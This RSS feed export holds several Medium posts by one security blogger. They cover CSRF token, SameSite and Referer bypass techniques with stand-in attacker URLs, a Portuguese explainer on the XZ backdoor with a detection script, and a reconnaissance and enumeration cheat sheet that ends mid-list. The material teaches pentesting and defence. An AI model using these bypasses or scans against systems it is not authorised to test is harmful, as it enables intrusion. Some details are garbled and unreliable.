<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0" xmlns:cc="http://cyber.law.harvard.edu/rss/creativeCommonsRssModule.html">
    <channel>
        <title><![CDATA[Stories by Morgan Bin Bash on Medium]]></title>
        <description><![CDATA[Stories by Morgan Bin Bash on Medium]]></description>
        <link>https://medium.com/@morganbinbash?source=rss-ef108b0e5738------2</link>
        <image>
            <url>https://cdn-images-1.medium.com/fit/c/150/150/1*R8m8CZDuNiIl2TQ53FCXAQ.png</url>
            <title>Stories by Morgan Bin Bash on Medium</title>
            <link>https://medium.com/@morganbinbash?source=rss-ef108b0e5738------2</link>
        </image>
        <generator>Medium</generator>
        <lastBuildDate>Sat, 23 May 2026 05:06:20 GMT</lastBuildDate>
        <atom:link href="https://medium.com/@morganbinbash/feed" rel="self" type="application/rss+xml"/>
        <webMaster><![CDATA[yourfriends@medium.com]]></webMaster>
        <atom:link href="http://medium.superfeedr.com" rel="hub"/>
        <item>
            <title><![CDATA[   ]]></title>
            <link>https://medium.com/@morganbinbash/-1b040adc77da?source=rss-ef108b0e5738------2</link>
            <guid isPermaLink="false">https://medium.com/p/1b040adc77da</guid>
            <category><![CDATA[pentesting]]></category>
            <category><![CDATA[cybersecurity]]></category>
            <category><![CDATA[cyber-threat-intelligence]]></category>
            <dc:creator><![CDATA[Morgan Bin Bash]]></dc:creator>
            <pubDate>Sun, 26 May 2024 05:10:27 GMT</pubDate>
            <atom:updated>2024-05-26T05:10:27.678Z</atom:updated>
            <content:encoded><![CDATA[<p><a href="https://ayo.so/morganbinbash">https://ayo.so/morganbinbash</a></p><iframe src="https://cdn.embedly.com/widgets/media.html?src=https%3A%2F%2Fgiphy.com%2Fembed%2FqQgKLMJvWEZKI2Hfvo%2Ftwitter%2Fiframe&amp;display_name=Giphy&amp;url=https%3A%2F%2Fmedia.giphy.com%2Fmedia%2Fv1.Y2lkPTc5MGI3NjExOWlmNXFjeWx5c21xMW8xbWd1NWUyNXZpNG8xbHp4Z2dtY3kyb24xNSZlcD12MV9pbnRlcm5hbF9naWZfYnlfaWQmY3Q9Zw%2FqQgKLMJvWEZKI2Hfvo%2Fgiphy.gif&amp;image=https%3A%2F%2Fmedia1.giphy.com%2Fmedia%2Fv1.Y2lkPTc5MGI3NjExN3o1eW9oenEydWZucGowdW1yN3pxNzdvYWp4aHlmbGowcjcyeHk4eSZlcD12MV9pbnRlcm5hbF9naWZfYnlfaWQmY3Q9Zw%2FqQgKLMJvWEZKI2Hfvo%2Fgiphy.gif&amp;key=a19fcc184b9711e1b4764040d3dc5c07&amp;type=text%2Fhtml&amp;schema=giphy" width="435" height="202" frameborder="0" scrolling="no"><a href="https://medium.com/media/bb9db553d4379f3e7b8bc8a7234183de/href">https://medium.com/media/bb9db553d4379f3e7b8bc8a7234183de/href</a></iframe><p>CSRF stands for Cross site request forgery where an attacker trick an victim to click on malicious link and to do intended action like changing password, email, purchasing product etc.<br>CSRF is easy to exploit you can use burpsuite pro to generate CSRF POC otherwise do things showing below.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/558/1*nbNU9SG1slYXVrir8Onitg.png" /></figure><p>save to POC and then exploit by clicking on it.</p><p>There are three type of defences against CSRF</p><ul><li>CSRF</li><li>Same-site cookie</li><li>Referrer based</li></ul><p>Note: There is bypasses for each weak security</p><p><strong>CSRF Token bypass:</strong></p><ul><li>[ ] Token validation depend on method</li><li>[ ] Token being present</li><li>[ ] Token is not tied to session (Try account A token in account B)</li><li>[ ] CSRF token tied to non-session cookie</li><li>[ ] CSRF token is duplicated and does not handle or store token at the server.</li></ul><h3>Same-site cookie restriction</h3><p>Site = scheme + 1 + tld</p><p>Origin = is full url</p><p>example:</p><p><a href="https://sub.domain.com:433">https://sub.domain.com:433</a></p><p>Here https, <a href="http://domain.com">doma</a><a href="http://in.com">in.com</a> and 443 is site</p><p>and Origin is full url = <a href="https://sub.domain.com:433">https://sub.domain.com:433</a></p><p><strong>How does samesite cookie work?</strong></p><p>Ans: same site cookie work by limiting the browser from making cross site request, before same site cookie was originated browser does not check where the request is originated from the same domain or not</p><p><strong>There are three level in same-site cookie:</strong></p><ol><li>Strict Same-Site: Strict</li><li>Lax Same-Site: Lax (Chrome browser by defult apply this security)</li><li>None Same-site: None</li></ol><p>In <strong>Strict</strong> level website fully restrict from making cross-site request if the host name does not match with name in the bar then request will not get completed</p><p>In <strong>Lax</strong> there is two condition to match to make cross-site request.</p><ul><li>Request uses GET method</li><li>Request resulted from a top-level navigation by the user</li></ul><p>In <strong>None</strong> Same-site restriction is NONE</p><p>to solve the labs use script tag and force the user to go to vulnerable link using document.location below is example how you can do it</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/558/1*wH-vp45l-ChK1vkJEbbYvQ.png" /></figure><p>If Same-Site restriction is set to Strict then first we need to find client site redirect and if the client side redirect is happening then only we can exploit this scenario</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/558/1*bPbKHve0gzDdKtzIdE2J2w.png" /></figure><p>same-site cookie bypass with cookie refresh</p><p>Bypassing Referrer based defence</p><p>#1 Token validation depend referrer header being present<br>We can remove referrer header from the request using below meta tag:<br>&lt;meta name=”referrer” content=”never”&gt; // try with both referer and referrer</p><p>#2 Validation of referer can be circumvented or CSRF with broken Referer validation<br>some application validate referer header in a naive way, they validate the certain keywords in the referer header value like domain name<br>so in this case attacker can host application domain as subdomain and then launch CSRF attack.<br>Example:<br><a href="http://vulnerable-website.com.attacker-website.com/csrf-attack">http://vulnerable-website.com.attacker-website.com/csrf-attack</a><br><a href="http://attacker-website.com/csrf-attack?vulnerable-website.com">http://attacker-website.com/csrf-attack?vulnerable-website.com</a><br>etc. play with referer header and see how application is validating referer header</p><ul><li>[ ] Lax bypass via override method (found _method parameter) (Changing the request method with overriding the method</li><li>[ ] Strict bypass via client-side redirect</li><li>[ ] SameSite lax bypass via cookie refresh (SSO)</li></ul><p>CSRF In JSON body —</p><p>To send JSON request in the body of request we can enter the data in name of the tag and value. below is the one of the example of that</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/561/1*wHp_tTF39GsAwrigeauq7g.png" /></figure><p>CSRF POC code would be like below</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/915/1*xBK2OSV4fh7FyYZJI_E-Og.png" /></figure><p><a href="https://beacons.ai/morganbinbash">https://beacons.ai/morganbinbash</a></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*NmTP7nXqvx29lRvFQ3FAng.jpeg" /></figure><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=1b040adc77da" width="1" height="1" alt="">]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[     ̧]]></title>
            <link>https://medium.com/@morganbinbash/%CC%A7-4613b24d48e4?source=rss-ef108b0e5738------2</link>
            <guid isPermaLink="false">https://medium.com/p/4613b24d48e4</guid>
            <category><![CDATA[pentesting]]></category>
            <category><![CDATA[red-team]]></category>
            <category><![CDATA[cybersecurity]]></category>
            <dc:creator><![CDATA[Morgan Bin Bash]]></dc:creator>
            <pubDate>Wed, 08 May 2024 03:02:09 GMT</pubDate>
            <atom:updated>2024-05-08T03:02:09.694Z</atom:updated>
            <content:encoded><![CDATA[<iframe src="https://cdn.embedly.com/widgets/media.html?src=https%3A%2F%2Fgiphy.com%2Fembed%2Fwl4qpVTu3se15zv6iq%2Ftwitter%2Fiframe&amp;display_name=Giphy&amp;url=https%3A%2F%2Fmedia.giphy.com%2Fmedia%2Fv1.Y2lkPTc5MGI3NjExbnJxZ3J1bjZoajdyNHJ5Z2F2cjQ0MGkycWp5Z251ZXNyb2ZhNjJmOCZlcD12MV9pbnRlcm5hbF9naWZfYnlfaWQmY3Q9Zw%2Fwl4qpVTu3se15zv6iq%2Fgiphy.gif&amp;image=https%3A%2F%2Fmedia0.giphy.com%2Fmedia%2Fv1.Y2lkPTc5MGI3NjExeTNkc2Y0YW95cXZ3MDJjcXl4ZnM2OTE0MWU4bWttOGh1MjlqN3VvaSZlcD12MV9pbnRlcm5hbF9naWZfYnlfaWQmY3Q9Zw%2Fwl4qpVTu3se15zv6iq%2Fgiphy.gif&amp;key=a19fcc184b9711e1b4764040d3dc5c07&amp;type=text%2Fhtml&amp;schema=giphy" width="435" height="185" frameborder="0" scrolling="no"><a href="https://medium.com/media/74b4d0d4e886f1384c1d8dca45358b2e/href">https://medium.com/media/74b4d0d4e886f1384c1d8dca45358b2e/href</a></iframe><h4>Os 10 Mandamentos da Cibersegurança:</h4><p>1- Mantenha seu software atualizado: <br>Instale atualizações de segurança e patches regularmente para proteger seu sistema contra vulnerabilidades conhecidas.</p><p>2- Use senhas fortes e exclusivas: <br>Crie senhas complexas e diferentes para cada conta, e considere o uso de um gerenciador de senhas para ajudar a mantê-las seguras.</p><p>3- Ative a autenticação de dois fatores (2FA): <br>Adicione uma camada extra de segurança às suas contas online exigindo um segundo método de verificação além da senha.</p><p>4- Proteja-se contra malware: <br>Utilize software antivírus/anti-malware atualizado e evite clicar em links ou baixar anexos de fontes não confiáveis.</p><p>5- Faça backup regularmente: <br>Mantenha cópias de segurança dos seus dados importantes em locais seguros e isolados para protegê-los contra perda devido a ataques ou falhas de hardware.</p><p>6- Seja cuidadoso com emails e mensagens: <br>Desconfie de mensagens não solicitadas, especialmente aquelas com links ou anexos, e verifique sempre a autenticidade antes de clicar ou responder.</p><p>7- Proteja sua rede: <br>Utilize firewalls, criptografia e outras medidas de segurança para proteger sua rede doméstica ou empresarial contra acessos não autorizados.</p><p>8- Esteja ciente de ameaças de engenharia social: <br>Esteja atento a tentativas de manipulação por parte de cibercriminosos para obter informações confidenciais ou acesso não autorizado.</p><p>9- Eduque-se e eduque outros: <br>Mantenha-se informado sobre as últimas tendências e ameaças em cibersegurança, e compartilhe boas práticas com colegas, amigos e familiares.</p><p>10- Tenha um plano de resposta a incidentes: <br>Esteja preparado para agir rapidamente em caso de violação de segurança, com um plano claro de como responder, mitigar danos e recuperar-se.</p><iframe src="https://cdn.embedly.com/widgets/media.html?src=https%3A%2F%2Fgiphy.com%2Fembed%2FfVyV3hpreH3oFHMjrZ%2Ftwitter%2Fiframe&amp;display_name=Giphy&amp;url=https%3A%2F%2Fmedia.giphy.com%2Fmedia%2Fv1.Y2lkPTc5MGI3NjExbm5iOG1mN3BubnByd2V5cHpwODF4bjIzMWR5MnZobzFpZXBsaGhoeiZlcD12MV9pbnRlcm5hbF9naWZfYnlfaWQmY3Q9Zw%2FfVyV3hpreH3oFHMjrZ%2Fgiphy.gif&amp;image=https%3A%2F%2Fmedia1.giphy.com%2Fmedia%2Fv1.Y2lkPTc5MGI3NjExY2I2NHZmMDA2MnJzdXJ4bGpvYjQwbnluOXkxM3dxbHVzNW9wZWM1cSZlcD12MV9pbnRlcm5hbF9naWZfYnlfaWQmY3Q9Zw%2FfVyV3hpreH3oFHMjrZ%2Fgiphy.gif&amp;key=a19fcc184b9711e1b4764040d3dc5c07&amp;type=text%2Fhtml&amp;schema=giphy" width="435" height="185" frameborder="0" scrolling="no"><a href="https://medium.com/media/2a284055a92daa864a0ee2e2c0b2438a/href">https://medium.com/media/2a284055a92daa864a0ee2e2c0b2438a/href</a></iframe><h4>Os pilares da cybersegurança:</h4><p>Os pilares da cibersegurança podem variar um pouco dependendo da fonte, mas geralmente incluem os seguintes aspectos fundamentais:</p><p>1- Confidencialidade: <br>Garantir que as informações e dados sensíveis sejam acessíveis apenas por pessoas autorizadas.</p><p>2- Integridade: <br>Manter a precisão e a confiabilidade dos dados, garantindo que não sejam alterados ou corrompidos por fontes não autorizadas.</p><p>3- Disponibilidade: <br>Assegurar que os sistemas e dados estejam disponíveis quando necessários, evitando interrupções e garantindo a continuidade dos serviços.</p><p>4- Autenticidade: <br>Verificar a identidade das partes envolvidas em transações e comunicações, garantindo que sejam quem afirmam ser.</p><p>5- Não repúdio: <br>Garantir que as partes envolvidas em uma transação não possam negar sua participação ou as ações realizadas.</p><p>6- Controle de acesso: <br>Limitar o acesso a recursos e informações apenas a usuários autorizados, com base em suas funções e necessidades.</p><p>7- Auditoria e monitoramento: <br>Registrar e analisar atividades de sistema e rede para identificar possíveis violações de segurança e comportamentos anômalos.</p><p>8- Resiliência: <br>Capacidade de resistir e se recuperar rapidamente de incidentes de segurança, minimizando impactos e garantindo a continuidade das operações.</p><p>Esses pilares formam a base para o desenvolvimento de estratégias e medidas de segurança cibernética eficazes em proteger sistemas, redes e dados contra ameaças e ataques.</p><p><a href="https://ayo.so/morganbinbash">morganbinbash | Ayo</a></p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=4613b24d48e4" width="1" height="1" alt="">]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[  — ]]></title>
            <link>https://medium.com/@morganbinbash/-ab99426d0c45?source=rss-ef108b0e5738------2</link>
            <guid isPermaLink="false">https://medium.com/p/ab99426d0c45</guid>
            <category><![CDATA[pentesting]]></category>
            <category><![CDATA[cybersecurity]]></category>
            <category><![CDATA[cybercrime]]></category>
            <dc:creator><![CDATA[Morgan Bin Bash]]></dc:creator>
            <pubDate>Mon, 15 Apr 2024 14:51:08 GMT</pubDate>
            <atom:updated>2024-04-15T14:51:08.521Z</atom:updated>
            <content:encoded><![CDATA[<h3>𝑩𝒂𝒄𝒌𝒅𝒐𝒐𝒓 𝑿𝒁 — 𝑳𝒊𝒏𝒖𝒙</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*U2DTBsM1BdRV8cWjXkwk_Q.jpeg" /></figure><p><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-3094">NVD</a></p><h4>O risco.</h4><p>Essa ameaça é perigosa devido à capacidade da backdoor de permitir que os atacantes executem código malicioso remotamente, sem deixar rastros nos logs do sshd.</p><h4>Quais distribuições podem conter utilitários maliciosos e quais estão seguras?</h4><p>Sabe-se que as versões 5.6.0 e 5.6.1 do XZ Utils foram incluídas nas compilações de março das seguintes distribuições Linux.</p><p>**Kali Linux, mas, de acordo com o [blog oficial](<a href="https://www.kali.org/blog/about-the-xz-backdoor/">https://www.kali.org/blog/about-the-xz-backdoor/</a>), apenas aquelas disponíveis entre 26 e 29 de março (o blog também contém instruções para verificar versões com componentes vulneráveis)**</p><p>**openSUSE Tumbleweed e openSUSE MicroOS, [disponíveis de 7 a 28 de março](<a href="https://news.opensuse.org/2024/03/29/xz-backdoor/)**">https://news.opensuse.org/2024/03/29/xz-backdoor/)**</a></p><p>**Fedora 41, Fedora Rawhide e Fedora Linux 40 beta**</p><p>**Debian (somente nas [distribuições *testing, unstable e experimental*](<a href="https://lists.debian.org/debian-security-announce/2024/msg00057.html))**">https://lists.debian.org/debian-security-announce/2024/msg00057.html))**</a></p><ul><li>*Arch Linux — imagens de contêiner disponíveis de 29 de fevereiro a 29 de março. No entanto, o site [org](<a href="http://archlinux.org/">http://archlinux.org/</a>) afirma que, devido às peculiaridades de implementação, este vetor de ataque não funcionará no Arch Linux, apesar de recomendarem fortemente a atualização do sistema.**</li></ul><h3>De acordo com informações oficiais divulgadas pelas próprias empresas</h3><p>Red Hat Enterprise Linux (RHEL), SUSE Linux Enterprise, openSUSE Leap e Debian Stable não são vulneráveis.</p><p>Quanto a outras distribuições, é aconselhável verificar manualmente a presença de versões com trojans do XZ Utils.</p><h3>Como o código malicioso foi implantado</h3><p>Aparentemente, foi um caso tipico de cessão de controle.</p><p>A pessoa que inicialmente mantinha o projeto XZ Libs no GitHub transferiu o repositório para uma conta que tem contribuído para vários repositórios relacionados à compressão de dados há vários anos.</p><p>E, em algum momento, alguém por trás daquela outra conta implantou uma backdoor no código do projeto.</p><p><a href="https://orca.security/resources/blog/critical-xz-utils-supply-chain-compromise-affects-multiple-linux-distributions-cve-2024-3094/">Critical XZ Utils Supply Chain Compromise Affects Multiple Linux Distributions (CVE-2024-3094)</a></p><h3>Confirme se o liblzma está comprometido.</h3><p>Primeiro, podemos detectar se a versão do liblzma contém o backdoor, graças a um script de Vegard Nossum.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*xXnxJnpNWz89CPHKRPxQkg.png" /></figure><p>(o script — detect.sh)</p><p>#! /bin/bash</p><p>set -eu</p><p># find path to liblzma used by sshd<br>path=”$(ldd $(which sshd) | grep liblzma | grep -o ‘/[^ ]*’)”</p><p># does it even exist?<br>if [ “$path” == “” ]<br>then<br> echo probably not vulnerable<br> exit<br>fi</p><p># check for function signature<br>if hexdump -ve ‘1/1 “%.2x”’ “$path” | grep -q f30f1efa554889f54c89ce5389fb81e7000000804883ec28488954241848894c2410<br>then<br> echo probably vulnerable<br>else<br> echo probably not vulnerable<br>fi<br>EOF</p><h4>Como executar esse script bash:</h4><p>$ chmod +x detect.sh</p><p>$ ./detect.sh</p><h3>Confirme se o daemon SSH está mais lento que o normal.</h3><p>sudo sed -E -i ‘s/^#?PasswordAuthentication .*/PasswordAuthentication no/’ /etc/ssh/sshd_config</p><p>Em seguida, reinicie o daemon.</p><p>sudo systemctl restart ssh</p><p>time ssh nonexistant@localhost</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*NZzdpIMZyGTGSiY3tvFnxw.png" /></figure><p>não há “valor certo” aqui, pois é altamente dependente de sua configuração específica. Porém, o que queremos é ter uma ideia de quanto tempo leva, então vamos executar o comando algumas vezes, para ter certeza de que os resultados são consistentes. Nos meus testes, os resultados são realmente muito consistentes, consigo 5,63 s reais quase o tempo todo.</p><h3>Agora vamos reinstalar a versão sem backdoor do liblzma.</h3><p>sudo apt update <strong>&amp;&amp;</strong> sudo apt install — yes liblzma5</p><p>time ssh nonexistant@localhost</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*HwXu47rSPYV0HYDezPHVRA.png" /></figure><p>Como podemos ver, a diferença de tempo é bastante clara, é muito mais rápido sem o backdoor!</p><h4>Créditos:</h4><ul><li><a href="https://www.openwall.com/lists/oss-security/2024/03/29/4">oss-security - backdoor in upstream xz/liblzma leading to ssh server compromise</a></li><li><a href="https://www.kali.org/blog/xz-backdoor-getting-started/">xz-utils backdoor: how to get started | Kali Linux Blog</a></li></ul><p><a href="https://beacons.ai/morganbinbash">https://beacons.ai/morganbinbash</a></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Dz_IT16ToWc9bqibENatCg.jpeg" /></figure><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=ab99426d0c45" width="1" height="1" alt="">]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[  ]]></title>
            <link>https://medium.com/@morganbinbash/-bc5ca0dc1dd5?source=rss-ef108b0e5738------2</link>
            <guid isPermaLink="false">https://medium.com/p/bc5ca0dc1dd5</guid>
            <category><![CDATA[pentesting]]></category>
            <category><![CDATA[cybersecurity]]></category>
            <category><![CDATA[deep-learning]]></category>
            <dc:creator><![CDATA[Morgan Bin Bash]]></dc:creator>
            <pubDate>Wed, 03 Apr 2024 15:33:43 GMT</pubDate>
            <atom:updated>2024-04-04T02:35:29.025Z</atom:updated>
            <content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*OAjtjsMC_xqX8DbQDW8tjw.jpeg" /></figure><p>𝘐𝘧 𝘺𝘰𝘶 𝘢𝘳𝘦 𝘢𝘭𝘳𝘦𝘢𝘥𝘺 𝘪𝘮𝘱𝘳𝘦𝘴𝘴𝘦𝘥 𝘣𝘺 𝘵𝘩𝘦 𝘢𝘳𝘵𝘪𝘤𝘭𝘦, 𝘺𝘰𝘶 𝘢𝘳𝘦 𝘪𝘯𝘷𝘪𝘵𝘦𝘥 𝘵𝘰 𝘤𝘰𝘯𝘵𝘪𝘯𝘶𝘦 𝘪𝘮𝘱𝘳𝘰𝘷𝘪𝘯𝘨 𝘺𝘰𝘶𝘳 𝘬𝘯𝘰𝘸𝘭𝘦𝘥𝘨𝘦. 𝘛𝘩𝘪𝘴 𝘤𝘰𝘮𝘱𝘳𝘦𝘩𝘦𝘯𝘴𝘪𝘷𝘦 𝘨𝘶𝘪𝘥𝘦 𝘸𝘪𝘭𝘭 𝘩𝘦𝘭𝘱 𝘺𝘰𝘶 𝘨𝘢𝘪𝘯 𝘢𝘯 𝘪𝘯-𝘥𝘦𝘱𝘵𝘩 𝘶𝘯𝘥𝘦𝘳𝘴𝘵𝘢𝘯𝘥𝘪𝘯𝘨 𝘰𝘧 𝘱𝘦𝘯𝘦𝘵𝘳𝘢𝘵𝘪𝘰𝘯 𝘵𝘦𝘴𝘵𝘪𝘯𝘨 𝘢𝘯𝘥 𝘪𝘴 𝘺𝘰𝘶𝘳 𝘧𝘪𝘳𝘴𝘵 𝘢𝘯𝘥 𝘣𝘦𝘴𝘵 𝘤𝘩𝘰𝘪𝘤𝘦 𝘵𝘰 𝘲𝘶𝘪𝘤𝘬𝘭𝘺 𝘭𝘦𝘢𝘳𝘯, 𝘳𝘦𝘧𝘦𝘳𝘦𝘯𝘤𝘦, 𝘢𝘯𝘥 𝘧𝘢𝘮𝘪𝘭𝘪𝘢𝘳𝘪𝘻𝘦 𝘺𝘰𝘶𝘳𝘴𝘦𝘭𝘧 𝘸𝘪𝘵𝘩 𝘤𝘰𝘮𝘮𝘢𝘯𝘥𝘴 𝘢𝘯𝘥 𝘵𝘦𝘤𝘩𝘯𝘪𝘲𝘶𝘦𝘴 𝘪𝘯 𝘵𝘩𝘪𝘴 𝘤𝘳𝘶𝘤𝘪𝘢𝘭 𝘢𝘳𝘦𝘢 𝘰𝘧 ​​𝘤𝘺𝘣𝘦𝘳𝘴𝘦𝘤𝘶𝘳𝘪𝘵𝘺. 𝘞𝘩𝘦𝘵𝘩𝘦𝘳 𝘺𝘰𝘶’𝘳𝘦 𝘢 𝘱𝘦𝘯𝘦𝘵𝘳𝘢𝘵𝘪𝘰𝘯 𝘵𝘦𝘴𝘵𝘪𝘯𝘨 𝘣𝘦𝘨𝘪𝘯𝘯𝘦𝘳 𝘰𝘳 𝘢𝘯 𝘦𝘹𝘱𝘦𝘳𝘵, 𝘵𝘩𝘪𝘴 𝘳𝘦𝘴𝘰𝘶𝘳𝘤𝘦 𝘤𝘰𝘯𝘵𝘢𝘪𝘯𝘴 𝘦𝘷𝘦𝘳𝘺𝘵𝘩𝘪𝘯𝘨 𝘺𝘰𝘶 𝘯𝘦𝘦𝘥 𝘵𝘰 𝘯𝘢𝘷𝘪𝘨𝘢𝘵𝘦 𝘵𝘩𝘦 𝘸𝘰𝘳𝘭𝘥 𝘰𝘧 𝘴𝘦𝘤𝘶𝘳𝘪𝘵𝘺 𝘢𝘴𝘴𝘦𝘴𝘴𝘮𝘦𝘯𝘵𝘴. 𝘌𝘹𝘱𝘭𝘰𝘳𝘦 𝘵𝘰𝘰𝘭𝘴, 𝘮𝘦𝘵𝘩𝘰𝘥𝘴, 𝘢𝘯𝘥 𝘪𝘯𝘴𝘪𝘨𝘩𝘵𝘴 𝘧𝘰𝘳 𝘦𝘧𝘧𝘦𝘤𝘵𝘪𝘷𝘦 𝘳𝘦𝘤𝘰𝘯𝘯𝘢𝘪𝘴𝘴𝘢𝘯𝘤𝘦, 𝘦𝘯𝘶𝘮𝘦𝘳𝘢𝘵𝘪𝘰𝘯, 𝘱𝘳𝘪𝘷𝘪𝘭𝘦𝘨𝘦 𝘦𝘴𝘤𝘢𝘭𝘢𝘵𝘪𝘰𝘯, 𝘱𝘢𝘴𝘴𝘸𝘰𝘳𝘥 𝘤𝘳𝘢𝘤𝘬𝘪𝘯𝘨, 𝘦𝘹𝘱𝘭𝘰𝘪𝘵 𝘳𝘦𝘴𝘦𝘢𝘳𝘤𝘩, 𝘢𝘯𝘥 𝘮𝘰𝘳𝘦. 𝘌𝘯𝘩𝘢𝘯𝘤𝘦 𝘺𝘰𝘶𝘳 𝘱𝘦𝘯𝘦𝘵𝘳𝘢𝘵𝘪𝘰𝘯 𝘵𝘦𝘴𝘵𝘪𝘯𝘨 𝘴𝘬𝘪𝘭𝘭𝘴 𝘸𝘪𝘵𝘩 𝘵𝘩𝘪𝘴 𝘷𝘢𝘭𝘶𝘢𝘣𝘭𝘦 𝘳𝘦𝘴𝘰𝘶𝘳𝘤𝘦!</p><h4>ℜ𝔢𝔠𝔬𝔫𝔫𝔞𝔦𝔰𝔰𝔞𝔫𝔠𝔢 𝔞𝔫𝔡 𝔢𝔫𝔲𝔪𝔢𝔯𝔞𝔱𝔦𝔬𝔫</h4><p>NMAP command</p><p>nmap -v -sS -A -T4 target <br>&gt; Nmap detailed scans, running synchronized stealth, T4 timings, OS and service version information, traceroute and service-specific scripts.<br>ping sweep sudo nmap -pn target Perform a ping scan of the target network to view all available IPs.<br>nmap -v -sS -p–A -T4 target <br>&gt; As above, but scans all TCP ports (takes longer).<br>nmap -v -sU -sS -p- -A -T4 target <br>&gt; As above, but scans all TCP ports and UDP scans (takes longer).<br>nmap -v -p 445 — script=smb-check-vulns — script-args=unsafe=1 192.168.1.X <br>&gt; Nmap script for scanning vulnerable SMB servers.<br>nmap localhost Displays all ports currently in use.<br>ls /usr/share/nmap/scripts/* | grep ftp <br>&gt; Search for keywords in nmap script.</p><p>Alternative host discovery methods that do not use Nmap.<br>netdiscover -r 192.168.1.0/24 <br>&gt; Discover IPs, MAC addresses, and MAC providers on the subnet from ARP.<br>arp-scan — interface=eth0 192.168.1.0/24 <br>&gt; ARP scan to discover hosts on the local network.<br>fping -g 192.168.1.0/24 <br>&gt; Send ICMP echo requests to multiple hosts to check if they are active.<br>masscan -p1–65535,U:1–65535 192.168.1.0/24 — rate=1000 <br>&gt; Scans all ports at a high rate, useful for initial discovery.</p><h4>Fast scan all ports with rustscan:</h4><p><a href="https://github.com/RustScan/RustScan?source=post_page-----bc5ca0dc1dd5--------------------------------">GitHub - RustScan/RustScan: 🤖 The Modern Port Scanner 🤖</a></p><p>wget <a href="https://github.com/RustScan/RustScan/files/9473239/rustscan_2.1.0_both.zip">https://github.com/RustScan/RustScan/files/9473239/rustscan_2.1.0_both.zip</a><br>unzip rustscan_2.1.0_both.zip<br>dpkg -i rustscan_2.1.0_amd64.deb<br>rustscan — ulimit=5000 — range=1–65535 -a &lt;host&gt; — -A -sC</p><h4>SMB enumeration</h4><p>In computer networks, Server Message Block (SMB) operates as an application layer network protocol and is primarily used to provide shared access to files, printers, and serial ports.<br>nbtscan 192.168.1.0/24 <br>&gt; Discover Windows/Samba servers on a subnet, find Windows MAC addresses, netbios names and discover client workgroups/domains.<br>enum4linux -a target-ip <br>&gt; Do everything, run all options except dictionary-based share name guessing (find Windows client domains/workgroups).<br>smbclient -L target-ip <br>&gt; Lists all SMB shares available on the target computer.<br>smbget -R smb://target-ip/share <br>&gt; Recursively download files from an SMB share.<br>rpcclient -U “” target-ip <br>&gt; Use an empty username to connect to the SMB server and list the available commands.<br>showmount -e target-ip <br>&gt; Displays the available shares on the target computer, useful for NFS.<br>smbmap -H target-ip <br>&gt; Displays the target’s sharing permissions.<br>smbstatus <br>&gt; Lists current Samba connections. Useful when running on the target machine.<br>Other host discovery methods</p><h4>𝔗𝔬𝔬𝔩 𝔥𝔦𝔫𝔱</h4><ul><li><a href="https://github.com/Pennyw0rth/NetExec">GitHub - Pennyw0rth/NetExec: The Network Execution Tool</a></li><li><a href="https://www.netexec.wiki/">Welcome | NetExec</a></li></ul><h4>Python local webserver</h4><p>Python local web server commands to facilitate shell and vulnerability exploitation on attack machines.<br>python -m SimpleHTTPServer 80 <br>&gt; Runs a basic HTTP server, perfect for providing a shell etc.<br>python3 -m http.server 80 <br>&gt; Use Python 3 to run a basic HTTP server.<br>python -m SimpleHTTPServer 80 — bind 192.168.1.2 <br>&gt; Bind the server to a specific IP address.</p><h4>Mount file share</h4><p>How to mount NFS/CIFS, Windows and Linux file shares.<br>mount 192.168.1.1:/vol/share /mnt/nfs <br>&gt; Mount the NFS share to. /mnt/nfs<br>mount -t cifs -o username=user,password=pass,domain=blah //192.168.1.X/share-name /mnt/cifs <br>&gt; Install Windows CIFS/SMB shares on Linux. /mnt/cifs<br>net use Z: \\win-server\share password /user:domain\janedoe /savecred /p:no <br>&gt; Mount a Windows share on Windows from the command line.<br>apt-get install smb4k -y <br>&gt; Install smb4k on Kali, a useful Linux GUI for browsing SMB shares.<br>smbclient -L //192.168.1.X -U username <br>&gt; Lists SMB shares available on Windows computers.</p><h4>Basic fingerprint</h4><p>Device fingerprinting or machine fingerprinting or browser fingerprinting is information collected about a remote computing device for identification purposes.<br>nc -v 192.168.1.1 25 <br>&gt; Basic version control/fingerprinting via displayed banner.<br>telnet 192.168.1.1 25 <br>&gt; Another approach to basic version control/fingerprinting.<br>curl -I 192.168.1.1 <br>&gt; Gets the HTTP headers used to fingerprint the web server.<br>nmap -O 192.168.1.1 <br>&gt; Use Nmap to perform operating system detection.<br>whatweb 192.168.1.1 <br>&gt; Determine the web technologies used on the target.</p><h4>SNMP enumeration</h4><p>SNMP enumeration is the process of enumerating user accounts on a target system using SNMP.<br>snmpcheck -t 192.168.1.X -c public <br>&gt; SNMP enumeration<br>snmpwalk -c public -v1 192.168.1.X 1 <br>&gt; SNMP enumeration<br>snmpenum -t 192.168.1.X SNMP <br>&gt; enumeration<br>onesixtyone -c names -i hosts <br>&gt; SNMP enumeration<br>snmpbulkwalk -v2c -c public -Cn0 -Cr10 192.168.1.X <br>&gt; Bulk SNMP enumeration</p><h4>DNS zone transfer</h4><p>nslookup -&gt; set type=any -&gt; ls -d blah.com <br>&gt; Windows DNS zone transfer<br>dig axfr blah.com@ _ <br>&gt; Linux DNS zone transfer<br>host -l blah.com _ <br>&gt; Another Linux DNS zone transfer 